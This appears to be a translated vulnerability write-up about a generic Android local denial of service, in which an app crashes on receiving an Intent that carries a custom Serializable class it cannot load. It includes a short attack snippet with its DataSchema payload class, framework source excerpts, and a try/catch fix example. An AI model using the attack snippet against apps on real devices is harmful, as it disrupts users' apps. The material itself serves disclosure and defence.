Android denial of service vulnerability analysis and vulnerability detection

Source: Internet
Author: User
Tags: try catch

  The "super denial of service vulnerability" is a generic Android denial-of-service vulnerability that allows a malicious attacker to make any app on the phone crash and stop working, affecting almost all apps on the Android devices currently on the market.

Vulnerability Analysis:

  0xr0ot and Xbalien found a generic local denial-of-service vulnerability while discussing all of the exception types that can lead to application denial of service. This general-purpose local denial of service can cause denial of service across a large number of apps.

The denial of service for serialized objects is mainly due to the application's use of the getSerializableExtra() API: because the application developer does not validate the incoming data, a malicious app can pass in malformed data and cause a local denial of service in the application.

Vulnerable application code snippet:

  Intent i = getIntent();
  if (i.getAction().equals("Serializable_action")) {
      i.getSerializableExtra("Serializable_key"); // no exception handling
  }

Attack application code snippet:

  Intent i = new Intent();
  i.setAction("Serializable_action");
  i.setClassName("com.exp.serializable", "com.exp.serializable.MainActivity");
  i.putExtra("Seriadddddlizable_dkey", XXX); // XXX is the malformed data passed in
  startActivity(i);

java.lang.ClassCastException

Later discussion found that when a custom Serializable or Parcelable object is passed in, the target component that receives the Intent throws a class-undefined exception, java.lang.NoClassDefFoundError, in getSerializableExtra(), getParcelable(), etc. This is because the serialized class object passed to the vulnerable application is not one of the application's own classes, so it cannot be found in the application's context.

The custom serialization class is simple:

  import java.io.Serializable;

  public class DataSchema implements Serializable {
      private static final long serialVersionUID = -3601187837704976264L;

      public DataSchema() {
          super();
      }
  }

In the corresponding attack code, XXX is replaced with new DataSchema(). We found that a class-undefined exception is thrown whether or not the key passed in matches the one used by the vulnerable application.

As testing progressed, we discovered through Logcat that the error log was not necessarily caused by getSerializableExtra() or getParcelable(). We then extended the test, passing our custom serialized class object to an app that calls getXXXExtra(), and found that the class-undefined exception was still thrown.

Test app code snippet:

  protected void onCreate(Bundle savedInstanceState) {
      super.onCreate(savedInstanceState);
      Intent intent = getIntent();
      intent.getStringExtra("ROIS"); // this still crashes with NoClassDefFoundError
  }

We then tested a number of mainstream applications on the market, including those from BAT, and found that this method can crash them. We started to think that this was a problem in Android itself and began reading the source code.

  /frameworks/base/core/java/android/content/Intent.java

  public String getStringExtra(String name) {
      return mExtras == null ? null : mExtras.getString(name);
  }

  /frameworks/base/core/java/android/os/Bundle.java

  public String getString(String key) {
      unparcel(); // process the data
      ...
  }

  /* package */ synchronized void unparcel() {
      ...
      mParcelledData.readMapInternal(mMap, N, mClassLoader);
      ...
  }

  /frameworks/base/core/java/android/os/Parcel.java

  readMapInternal parses the data passed in:

  /* package */ void readMapInternal(Map outVal, int N,
          ClassLoader loader) {
      while (N > 0) {
          Object key = readValue(loader);
          Object value = readValue(loader);
          outVal.put(key, value);
          N--;
      }
  }

Finally, when a Serializable object is parsed, an exception is thrown because the class is not loaded:

  public final Serializable readSerializable() {
      ...
      try {
          ObjectInputStream ois = new ObjectInputStream(bais);
          return (Serializable) ois.readObject();
      } catch (IOException ioe) {
          throw new RuntimeException("Parcelable encountered " +
              "IOException reading a Serializable object (name = " + name +
              ")", ioe);
      } catch (ClassNotFoundException cnfe) {
          throw new RuntimeException("Parcelable encountered " +
              "ClassNotFoundException reading a Serializable object (name = "
              + name + ")", cnfe);
      }
  }

Looking back, though, Google certainly does not consider this an Android bug; developers just need to add a try/catch to catch the exception.

Vulnerability detection:

AI has developed an automated testing tool that developers can use for vulnerability detection. Detection tool: http://www.ineice.com/

Bug fix:

Whatever extra is being read, every getXXXExtra() call should be wrapped in a try/catch that catches the exception.
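
The fix above, written out as a receiving activity (an added example, not code from the original article). The action and key strings come from the article's snippets; `Request`, `safeSerializable`, `safeString` and the log tag are hypothetical names. The catch covers both the RuntimeException that readSerializable() throws and the NoClassDefFoundError the article reports, and the type check avoids the ClassCastException.

```java
import android.app.Activity;
import android.content.Intent;
import android.os.Bundle;
import android.util.Log;
import java.io.Serializable;

public class MainActivity extends Activity {
    private static final String TAG = "SafeExtras"; // hypothetical log tag

    // Hypothetical payload type this activity expects under "Serializable_key".
    public static class Request implements Serializable {
        private static final long serialVersionUID = 1L;
        public String query;
    }

    // Returns null for malformed, unknown-class or wrong-type data instead of crashing.
    static <T extends Serializable> T safeSerializable(Intent i, String key, Class<T> type) {
        try {
            Serializable s = i.getSerializableExtra(key); // triggers Bundle.unparcel()
            return type.isInstance(s) ? type.cast(s) : null; // no ClassCastException
        } catch (RuntimeException | NoClassDefFoundError e) {
            Log.w(TAG, "rejecting extras of untrusted Intent", e);
            return null;
        }
    }

    // Same guard for getStringExtra(): any getXXXExtra() unparcels the whole Bundle.
    static String safeString(Intent i, String key) {
        try {
            return i.getStringExtra(key);
        } catch (RuntimeException | NoClassDefFoundError e) {
            Log.w(TAG, "rejecting extras of untrusted Intent", e);
            return null;
        }
    }

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        Intent i = getIntent();
        // Constant-first equals(): a missing action cannot throw NullPointerException.
        boolean expected = i != null && "Serializable_action".equals(i.getAction());
        Request req = expected ? safeSerializable(i, "Serializable_key", Request.class) : null;
        if (req == null) { // unexpected, malformed or hostile Intent: stop, do not crash
            finish();
            return;
        }
        Log.i(TAG, "query=" + req.query + " rois=" + safeString(i, "ROIS"));
    }
}
```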

